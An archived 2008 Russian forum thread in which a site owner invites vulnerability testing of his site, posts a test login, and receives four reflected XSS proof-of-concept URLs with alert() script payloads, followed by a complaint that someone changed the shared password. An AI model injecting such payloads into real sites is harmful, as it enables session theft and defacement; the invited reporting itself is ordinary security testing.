PDA

Просмотр полной версии : Сделали сайтик проверьте на уязвимости

truelamer
27.03.2008, 19:58
http://gena.x53.ru


вот пароль от кабинета чтоб там потыкали)

login:AntichatUser
pass:1


О багах сообщите пжлст.
LAEOT
28.03.2008, 19:26
Hello Truelamer,
Sorry that I speak only in English (Russian language is not yet installed on my pc ;) ).
1. I found a XSS:
http://gena.x53.ru/cabinet.php?about_us=1'="><script>alert(/XSS-BY-LAEOT/)</script>
# it's on all pages! (....(something)="Here we place our bad code)).
2. Another XSS:
http://gena.x53.ru/cabinet.php?org_full=60="><script>alert(/XSS-BY-LAEOT/)</script>&active=1
3. XSS :
http://gena.x53.ru/index.php?cid=1'="><script>alert(/XSS-BY-LAEOT/)</script>&aid=1'&archive=1'
4.XSS:
http://gena.x53.ru/index.php?error=="><body onLoad=alert(/XSS-BY-LAEOT/)>
-------------------------------------------------
That's all what i've found.
And your login account doesn't work ;)
But ok.. good luck with your site!

LAEOT
truelamer
28.03.2008, 20:50
Hello Truelamer,
Sorry that I speak only in English (Russian language is not yet installed on my pc ;) ).
1. I found a XSS:
http://gena.x53.ru/cabinet.php?about_us=1'="><script>alert(/XSS-BY-LAEOT/)</script>
# it's on all pages! (....(something)="Here we place our bad code)).
2. Another XSS:
http://gena.x53.ru/cabinet.php?org_full=60="><script>alert(/XSS-BY-LAEOT/)</script>&active=1
3. XSS :
http://gena.x53.ru/index.php?cid=1'="><script>alert(/XSS-BY-LAEOT/)</script>&aid=1'&archive=1'
4.XSS:
http://gena.x53.ru/index.php?error=="><body onLoad=alert(/XSS-BY-LAEOT/)>
-------------------------------------------------
That's all what i've found.
And your login account doesn't work ;)
But ok.. good luck with your site!

LAEOT

Извени разочарую, это не косяк на сайте, это косяк на хостинге. Все сайты на этом фри хосте уязвимы у них эта пассивная xss, я про это уже писал. Т.е. везде где есть параметры в скрипте есть xss и видно её только в експлорере. Вот....
truelamer
28.03.2008, 20:53
Блин я зол! Я пароль от кабинета давал не чтоб его меняли а чтоб тестили. Как теперь другие туда попадут? Я только завтра его изменю через БД когда на работу приду. НУ ИМЕЙТЕ ЖЕ СОВЕСТЬ!
LAEOT
28.03.2008, 22:02
Извени разочарую, это не косяк на сайте, это косяк на хостинге. Все сайты на этом фри хосте уязвимы у них эта пассивная xss, я про это уже писал. Т.е. везде где есть параметры в скрипте есть xss и видно её только в експлорере. Вот....
Oh.. I'm sorry,I didn't know about that ;)
But i'll test it when you have reset the password tomorrow :)